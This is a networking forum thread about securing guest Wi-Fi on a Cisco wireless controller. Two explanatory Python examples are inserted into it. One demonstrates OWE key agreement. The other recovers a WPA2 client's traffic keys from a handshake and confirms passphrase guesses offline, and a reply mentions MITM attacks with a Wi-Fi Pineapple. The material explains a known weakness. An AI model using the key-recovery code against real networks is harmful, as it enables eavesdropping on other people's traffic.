WLC Local Guests Users Secure Access

jmprats
Level 4

I would like to secure the wireless guest access. Those guest users are local in the controller.

At the moment, they connect through a captive portal without L2 security.

I don't like to use a PSK, because in the end the PSK is going to be known to the guests.

Can we use local guest users with PEAP or LEAP? Or are they only for web authentication?

Any recommendation to secure wireless guest access?

Thanks

12 Replies

Hi

 

"Can we use local guest users with PEAP or LEAP? Or are they only for web authentication?"

Yes.

 

Well, the best option in my opinion is to use an external RADIUS server, preferably an ISE server. But you can also configure Local EAP on the WLC and query an external LDAP server.

Here is some material on that:

https://www.cisco.com/c/en/us/td/docs/wireless/controller/7-4/configuration/guides/consolidated/b_cg74_CONSOLIDATED/b_cg74_CONSOLIDATED_chapter_010101101.pdf

As a side note, using a PSK for guests is terrible in my opinion, and sometimes it is not even possible.

 

-If I helped you somehow, please, rate it as useful.-

 

Thanks, but I'm talking about using the local guest users in the controller, not in a remote LDAP server.

Can we use those local guest users in a secure way, different from open authentication with a captive portal?

Thanks

Haydn Andrews
VIP Alumni

When you say secure, are you talking about the device side, or about traffic between the guest and corporate networks?

 

For network traffic, you could use ACLs, Firewalls or an Anchored solution where the guest traffic is dropped into a DMZ.

 

For Auth to the network, I don't recommend PSK for a guest network, too much management overhead changing the PSK etc.

I would recommend using a portal of some kind.

Now from that you have different options:

  • Sponsored Portal
  • Hotspot (UAP) 
  • Self registration portal

Take a look at the deployment guide for details around different guest modes:

https://www.cisco.com/c/en/us/td/docs/wireless/controller/8-1/Enterprise-Mobility-8-1-Design-Guide/Enterprise_Mobility_8-1_Deployment_Guide/WirelessNetwork_GuestAccessService.html

*****Help out other by using the rating system and marking answered questions as "Answered"*****
*** Please rate helpful posts ***

Thanks, but I'm talking about securing the guest access. This document talks about using no layer 2 security and web portal authentication.

Open wifi is never recommended:

https://www.csoonline.com/article/3246984/wi-fi/why-you-should-never-ever-connect-to-public-wifi.html

https://www.europol.europa.eu/activities-services/public-awareness-and-prevention-guides/risks-of-using-public-wi-fi

 

It's very easy to create MITM attacks, packet sniffers or fake/rogue APs. After you connect to an open network, your client is always going to connect to that SSID, inside and outside your organization, without authentication, making the attacker's work very easy.

Is it possible that Cisco has no other recommendation for guest access?

Thanks

There's no solution for that currently. Using a PSK could help partially, but the problem it creates is too big. The definitive solution is about to come with something called "Enhanced Open".

Enhanced Open will encrypt all wireless packets from the beginning of the connection. Clients and APs that support Enhanced Open will exchange extra information in the beacons, allowing them to establish an encrypted session without user intervention. This will be totally transparent to the users and will definitely solve the open network problem.

However, we need to wait until the market embraces it.

 

 

-If I helped you somehow, please, rate it as useful.- 
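The exchange the reply above describes, as an added example that is not part of the original thread and is not Cisco code: the OWE (Opportunistic Wireless Encryption, marketed as Wi-Fi Enhanced Open) key agreement from RFC 8110. The client puts a Diffie-Hellman public value in its Association Request, the AP answers with its own in the Association Response, both derive a PMK with HKDF and then run the ordinary 4-way handshake, so every client gets its own keys with no password and no user interaction. The curve arithmetic is pure Python P-256 (IKE group 19, the group OWE mandates), all keys are generated in the script, and the little-endian encoding of the group number inside the HKDF salt is an assumption noted in the code; check RFC 8110 section 4.4 before relying on it for interop. One caveat a practitioner should keep in mind: RFC 8110 states that OWE does not authenticate the AP, so it stops passive sniffing and the shared-key problem, but an evil twin can still complete the exchange with the client.

```python
"""Added example (not from the thread): OWE / Enhanced Open key agreement, RFC 8110.

Client and AP each send one DH public value (x-coordinate only) in the association
frames and derive a PMK with HKDF. A sniffer sees both public values but not z.
"""
import hashlib
import hmac
import secrets

# NIST P-256 domain parameters (IKE group 19, the mandatory OWE group)
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
GROUP = 19


def on_curve(pt) -> bool:
    """True for infinity (None) or any (x, y) with y^2 = x^3 - 3x + b mod P."""
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine group law on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None  # P + (-P)
        lam = (3 * x1 * x1 + A) * pow(2 * y1, P - 2, P) % P  # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, P - 2, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k: int, pt):
    """Double-and-add. Not constant time: a teaching example, not production code."""
    acc = None
    while k:
        if k & 1:
            acc = point_add(acc, pt)
        pt = point_add(pt, pt)
        k >>= 1
    return acc


def point_from_x(x: int):
    """OWE sends only x (RFC 8110 sect. 4.3). Either root y gives the same shared x."""
    rhs = (x * x * x + A * x + B) % P
    y = pow(rhs, (P + 1) // 4, P)  # valid square root because P = 3 mod 4
    if (y * y) % P != rhs:
        raise ValueError("x is not on P-256: reject the association")
    return (x, y)


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:length]


def owe_keypair():
    """Fresh private scalar and the x-only public encoding that goes on the air."""
    priv = secrets.randbelow(N - 1) + 1
    return priv, scalar_mult(priv, G)[0].to_bytes(32, "big")


def owe_derive(my_priv: int, peer_x: bytes, client_x: bytes, ap_x: bytes):
    """prk = HKDF-extract(C | A | group, z); PMK = HKDF-expand(prk, "OWE Key Generation", 32).

    ASSUMPTION: the 2-octet group number is little-endian, as in the DH Parameter element.
    """
    z = scalar_mult(my_priv, point_from_x(int.from_bytes(peer_x, "big")))[0].to_bytes(32, "big")
    prk = hkdf_extract(client_x + ap_x + GROUP.to_bytes(2, "little"), z)
    pmk = hkdf_expand(prk, b"OWE Key Generation", 32)
    pmkid = hashlib.sha256(client_x + ap_x).digest()[:16]  # Truncate-128(Hash(C | A))
    return pmk, pmkid


def simulate_association():
    """Both sides of one OWE association: (client result, AP result, what was on the air)."""
    c_priv, c_x = owe_keypair()  # client: DH Parameter element in Association Request
    a_priv, a_x = owe_keypair()  # AP: DH Parameter element in Association Response
    client_side = owe_derive(c_priv, a_x, c_x, a_x)
    ap_side = owe_derive(a_priv, c_x, c_x, a_x)
    return client_side, ap_side, {"client_x": c_x, "ap_x": a_x}  # no scalar, no z, no PMK on the air


if __name__ == "__main__":
    (c_pmk, c_pmkid), (a_pmk, a_pmkid), wire = simulate_association()
    print("PMK agreed without any shared secret:", c_pmk == a_pmk, "PMKID:", c_pmkid.hex())
```

The resulting PMK feeds the same 4-way handshake WPA2 uses, so the per-client TK that comes out of it is unique to that association; a second guest on the same SSID, or a sniffer, learns nothing from their own association about yours. What OWE does not give you is any proof that the AP you associated with is the right one, which is why the thread's later point about a Wi-Fi Pineapple still applies.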

"Enhanced Open" sounds great.

But meanwhile we have to offer solutions. Maybe PEAP could be a solution. It is the same for a guest user to enter his credentials in a captive portal or in the Wi-Fi configuration, so I don't understand why Cisco doesn't support that for guest users, or does it?

Thanks

PEAP stands for Protected EAP and requires a username and password on the client side. Any solution that requires a username and password, or even only a password, does not apply easily to guest networks. If you need to touch users' devices, or if you need to inform users about anything beforehand, you lose all the benefit of this kind of solution.

Guest is meant to be something easy to handle. But the price is facing an insecure process while connecting.

 

 

-If I helped you somehow, please, rate it as useful.-

Cisco Wireless Guest Access with a captive portal requires a user and password for each client too, but on an open Wi-Fi.

Yes, it does. All guest portals actually should ask. But this is totally different. The username and password on the portal are easy to handle. You can prepare the portal so that the user can fill in the information and define his own password. Or you can even use social media credentials, which is very fancy.

 

 The point I am trying to make here is that by nature, Guest network is insecure and this problem will be solved as I mentioned earlier.

Here in the company I work for, we banned all kinds of authentication other than certificate (EAP-TLS). Even WPA2 the security team prohibited, due to the vulnerability in the four-way handshake.

But for guest, I don't see any easy solution for now.

 

-If I helped you somehow, please, rate it as useful.-

 

Maybe PEAP could be a solution.

As mentioned above, there are currently NO layer 2 encrypted guest standards. This is partly what WPA3 will solve.

 

The issue you have using a PSK has been discussed: you give everyone the PSK, they can share it with whoever they want, and once authenticated they can capture and decode anything on that network.

 

PEAP has the issue that you need the client device to have the server certificate to validate it. This leads to its own problems: how do you get it onto the user's device, how do you make sure they validate it, etc.

 

This is a GUEST network; your Terms and Conditions will protect your company, if that's what you're really worried about. This is practically how every company says to do it, and why best practice when connected to a GUEST network is to use a VPN to encrypt your traffic.

 

Take a look at how APPLE does Guest access - its purely an open SSID, no PSK, no Captive Portal just straight to the internet, no layer 2 encryption. 

 

Realistically, unless you're doing EAP-TLS (which would be impossible for guest, or at the very least not very user friendly), I can do a MITM attack against pretty much every other type of security. With a Wi-Fi Pineapple I can probably get 80% of people's devices to connect to me without even trying.

 

 

*****Help out other by using the rating system and marking answered questions as "Answered"*****
*** Please rate helpful posts ***
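The PSK objection raised in the first reply and spelled out in the post above ("once authenticated they can capture and decode anything on that network"), as an added example that is not part of the original thread and is not Cisco code. With WPA2-Personal the passphrase and SSID fix the PMK, and the only other inputs to the pairwise key are the two MAC addresses and the two nonces that every 4-way handshake broadcasts in the clear. So anyone who has the guest PSK, including everyone a guest has shared it with, can derive another client's keys from one passively captured handshake and confirm them against the handshake MIC. The script uses only the Python standard library; the MACs, nonces and EAPOL-Key frame are constructed in the script, not captured, and the passphrase and SSID are placeholders.

```python
"""Added example (not from the thread): why a shared PSK is not confidentiality.

Anyone who knows the passphrase and captures one 4-way handshake can derive the
victim's pairwise keys. Standard library only; all handshake data is constructed.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes into the EAPOL-Key descriptor


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512 on HMAC-SHA1, as used for the WPA2/CCMP PTK."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK from the PMK plus the four values every sniffer sees: both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    # KCK signs the handshake, KEK wraps the GTK, TK is the CCMP key for this client's data frames
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """EAPOL-Key MIC for WPA2 (AKM 00-0F-AC:2): HMAC-SHA1 over the frame with the MIC zeroed, 128 bits."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key message 2 of the 4-way handshake (constructed; RSN IE omitted)."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1), pairwise, MIC present
    body = struct.pack(">BHHQ", 2, key_info, 0, 1)  # type 2 (RSN), key info, key length, replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)  # key nonce, key IV, RSC, key ID
    body += mic + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL version 2, type 3 = EAPOL-Key


def constructed_capture(passphrase: str, ssid: str):
    """Return (what a passive sniffer sees, the victim's real TK) for a constructed handshake."""
    aa = bytes.fromhex("001122334455")   # AP BSSID (constructed)
    spa = bytes.fromhex("66778899aabb")  # victim client MAC (constructed)
    anonce = hashlib.sha256(b"anonce").digest()  # fixed so the example is reproducible
    snonce = hashlib.sha256(b"snonce").digest()
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    msg2 = build_msg2(snonce, mic=eapol_mic(ptk["kck"], build_msg2(snonce)))
    capture = {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "msg2": msg2}
    return capture, ptk["tk"]


def recover_tk(guess: str, ssid: str, cap: dict):
    """Attacker with the shared passphrase: rebuild the PTK, confirm it via the MIC, return the victim's TK."""
    ptk = derive_ptk(pmk_from_passphrase(guess, ssid), cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
    captured_mic = cap["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    if hmac.compare_digest(eapol_mic(ptk["kck"], cap["msg2"]), captured_mic):
        return ptk["tk"]
    return None  # wrong passphrase: the MIC does not verify and no key is recovered


if __name__ == "__main__":
    cap, victim_tk = constructed_capture("GuestWiFi2019", "CorpGuest")
    print("recovered TK matches victim:", recover_tk("GuestWiFi2019", "CorpGuest", cap) == victim_tk)
    print("wrong passphrase recovers:", recover_tk("Wrong", "CorpGuest", cap))
```

The MIC check is the same step a dictionary attack against a captured handshake performs, which is the other half of the PSK problem: a guest passphrase short enough to print on a sign is also short enough to guess offline. Rotating the PSK, as suggested in the replies, does not change either property; it only shortens the window during which a given handshake capture is useful.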

I have to agree with the others. You have a guest solution and that to be honest should be easy for any user to connect to. To secure it, really doesn’t make sense because you have folks that will not type the correct username/password/PSK. I have seen companies try doing something like this and end up getting more complaints on guest than with their internal secure SSID. More tickets and more overhead. It’s a Guest network, keep it as simple as possible.
-Scott
*** Please rate helpful posts ***